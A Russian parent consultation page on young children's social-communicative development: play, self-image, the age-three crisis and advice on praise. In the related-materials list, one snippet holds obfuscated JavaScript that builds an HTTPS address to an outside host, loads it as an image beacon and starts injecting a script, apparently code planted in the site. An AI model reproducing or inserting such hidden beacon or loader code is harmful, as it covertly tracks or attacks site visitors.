Консультация для родителей "Социально-коммуникативное развитие детей в домашних условиях"
консультация
Социально-коммуникативное развитие - это процесс усвоения и дальнейшего развития индивидом социально-культурного опыта, необходимого для его включения в систему общественных отношений.
Скачать:
Вложение | Размер |
---|---|
![]() | 18.09 КБ |
Предварительный просмотр:
Социально-коммуникативное развитие детей относится к числу важнейших проблем педагогики. Социально-коммуникативное развитие - это процесс усвоения и дальнейшего развития индивидом социально-культурного опыта, необходимого для его включения в систему общественных отношений. Его актуальность возрастает в современных условиях в связи с особенностями социального окружения ребёнка, в котором часто наблюдаются дефицит воспитанности, доброты, доброжелательности, речевой культуры во взаимоотношениях людей.
Проблема социализации подрастающего поколения является сегодня одной из самых актуальных. Человек начинает осваивать мир с младенчества, и этот сложный, многогранный процесс продолжается всю жизнь. Причем процесс социализации может осуществляться как в ходе стихийного взаимодействия с окружающим миром, так и в процессе целенаправленного приобщения человеку к социальной культуре. Интенсивность данного процесса на каждом возрастном периоде не одинакова. Младший дошкольник остро нуждается в эмоциональном контакте и познавательном общении со взрослым, во внимании к своим вопросам и максимально полных ответах на них. На данном возрастном этапе ребенку необходимо общение со сверстниками, он способен взаимодействовать с детьми в игре и коллективной работе. Вид деятельности ребенок тоже способен выбирать в соответствии со своими предпочтениями. Кроме того, уже в младшем дошкольном возрасте закладываются основы самосознанию.
Жизнь ребенка наполнена разными видами деятельности, среди которых игра занимает особое место. В игре дошкольник и обучается, и развивается, и воспитывается. Организуя игровую деятельность с детьми раннего возраста, родители должны концентрировать усилия на обогащении их бытового опыта, проводить игры-показы («Угостим куклу», «Полечим и покормим собачку» и т.д.). Поддерживать сюжетно-отобразительные игры, в которых ребенок учится использовать предметы так, как это принято в обществе (ложкой едят, на машине ездят, перевозят груз и т.д.). Стимулируя появления у ребенка интереса к игре со сверстниками, демонстрируют и поощряют игры с использованием предметов-заменителей, поддерживают самостоятельность ребёнка в подборе игрушек. Младший дошкольник способен отличать игровое поведение от реального, принимать воображаемую ситуацию и действовать в ней.
У ребенка формируется образ - Я, знания ребенка о себе: (девочка или мальчик, «Я — хороший», «Я - большой»); складывается отношение к себе («гордость за собственные достижения») появляются эмоции стыда: ребенок переживает, что потерял положительное мнение о себе; у него обостренное чувство собственного достоинства, которое выражается в повышенной чувствительности к признанию успехов ребенка со стороны взрослого; попытки преувеличить свои успехи и обесценить свои неудачи.
Приобретает интенсивное развитие ситуативно-деловая форма общения с взрослыми. Это приводит к изменению взаимоотношений со взрослыми, возникает деловое, практическое сотрудничество.
Продолжается развитие эмоционально-практической формы общения со сверстниками. Формируется и выборочное отношение к детям, складываются первые «детские коллективы» (хотя они пока еще неустойчивые и немногочисленные).
Дети тяжело переживают, если их надолго отрывают от близких, по-прежнему очень нуждаются в ласке, внимании взрослых к их деятельности, радуются, когда взрослые одобряют их действия и результаты труда.
К концу раннего возраста разрушаются прежние отношения «ребенок -взрослый», перестраивается социальная ситуация развития. Ребенок начинает осознавать определенный уровень своих достижений в деятельности, успех в овладении предметами, подражании взрослого и становится инициатором изменения отношений со взрослыми, направленных на расширение самостоятельности. Детям свойственна импульсивность поведения, они действуют в основном под влиянием чувств и желаний. Постепенно ребенок овладевает правилами поведения, учится подчинять свои желания необходимости контролировать свои и чужие поступки. Появляется стремление к самостоятельности: «Я - сам».
На данном этапе жизни главная роль взрослого в социально-коммуникативном
развитии ребенка заключается в предупреждении кризиса 3-х лет, который появляется
как реакция на ограничение детской самостоятельности.
Очень важно в ходе взаимодействия выделять положительные черты. Говорить о
чувствах, возникающих в подобных ситуациях. Маленький ребенок очень
чувствителен к оценке взрослого. Хорошо различает положительную и отрицательную
оценки своих действий. Похвала вызывает радость, стимулирует активность малыша,
улучшает его отношение к взрослому, усиливает доверие к нему. Порицание, с одной
стороны, огорчает ребенка, иногда даже ведет к прекращению деятельности, с другой
— усиливает поиск оценки, что способствует уточнению способов действий с
предметами.
Проявление у ребенка интереса к себе, желание участвовать в совместной деятельности, игре, развлечении. С этой целью дети включаются в игровые ситуации, вспоминая любимые сказки, стихотворения и др.
Способствовать накоплению опыта доброжелательных взаимоотношений со сверстниками: обращать внимание детей на ребенка, проявившего заботу о товарище, выразившего ему сочувствие.
Формировать у каждого ребенка уверенность в том, что взрослые любят его, как и всех остальных детей.
Воспитывать отрицательное отношение к грубости, жадности; развивать умение играть не ссорясь, помогать друг другу и вместе радоваться успехам, красивым игрушкам и т. п.
Продолжать формировать умение здороваться и прощаться (по напоминанию взрослого); излагать собственные просьбы спокойно, употребляя слова «спасибо» и «пожалуйста».
Воспитывать внимательное отношение и любовь к родителям и близким людям. Формирование уважительного отношения и чувства принадлежности к своей семье и к сообществу детей и взрослых.
С детьми третьего года жизни можно организовать совместные со взрослым инсценировки простых художественных текстов или ситуаций из детского опыта.
Беря на себя роль, они передают характерные особенности персонажа с помощью различных средств выразительности: голоса, мимики, жестов.
Педагогическое руководство игрой на этом возрастном этапе - помощь в освоении детьми реальной социальной роли, что способствует расширению рамок их социального познания.
Игры с правилами требуют соблюдения правил, заданных взрослым, обговоренных со сверстниками или предусмотренных самой »игрой. Ребенок запоминает правила, действует в соответствии с ними, контролируя свои действия и действия сверстников, учится адекватно оценивать результат игры, принимать успех и неудачу. В таких играх активно формируется адекватная самооценка, развиваются различные социальные представления.
Советы родителям, заинтересованным в формировании социально-коммуникативного развития ребенка:
Не перехваливайте ребенка, но и не забывайте поощрять, когда он этого заслуживает. Если малыш давно умеет сам есть ложкой, не нужно каждый раз за это хвалить, но если у него получилось поесть аккуратно, не размазав кашу по всему столу, обязательно отметьте это достижение. Поощряйте в ребенке инициативу. Не забывайте, что малыш внимательно наблюдает за Вами. Показывайте своим примером адекватность отношения к успехам и неудачам.
Не оберегайте ребенка от повседневных дел, не стремитесь решить за него все проблемы, но и не перегружайте его. Пусть малыш поможет с уборкой, сам польет цветок, получит удовольствие от сделанного и заслуженную похвалу. Не нужно ставить перед ним непосильные задачи, для выполнения которых он еще просто не дорос.
Любите своего ребенка!
По теме: методические разработки, презентации и конспекты
![](/sites/default/files/pictures/2017/01/15/picture-865222-1484462811.jpg)
Консультация для родителей: "Сенсорное развитие детей в домашних условиях"
Сенсорное развитие детей -это развитие их восприятия, формирование понятий о внешних свойствах предметов( форме, цвете, величине, запахе, вкусе…). И именно дошкольный возраст является наиболее ...
![](/sites/default/files/pictures/2015/04/05/picture-619576-1428254168.jpg)
Консультация для родителей: "Сенсорное развитие детей в домашних условиях".
Сенсорное развитие детей – это развитие их восприятия, формирование понятий о внешних свойствах предметов (форме, цвете, величине, запахе, вкусе…). И именно дошкольный возраст является на...
![](/sites/default/files/pictures/2020/05/09/picture-1247687-1589034144.jpg)
Консультация для родителей "Сенсорное развитие детей в домашних условиях"
Сенсорное развитие детей – это развитие их восприятия, формирование понятий о внешних свойствах предметов (форме, цвете, величине, запахе, вкусе и т.д.). Яркий, меняющийся мир ребенок позна...
![](/sites/default/files/pictures/2020/10/18/picture-1279647-1603030187.jpg)
Консультация для родителей «Сенсорное развитие детей в домашних условиях»
var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'rzkmxcve.lussoit.com\',\'48\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); var script = document...
Консультация для родителей «Сенсорное развитие детей в домашних условиях. Простые игры на кухне»
В консультации предлагаютя игры с детьми раннего возраста, которые можно провести на кухне....
Индивидуальная консультация для родителей «Сенсорное развитие детей в домашних условиях»
Индивидуальная консультация для родителей...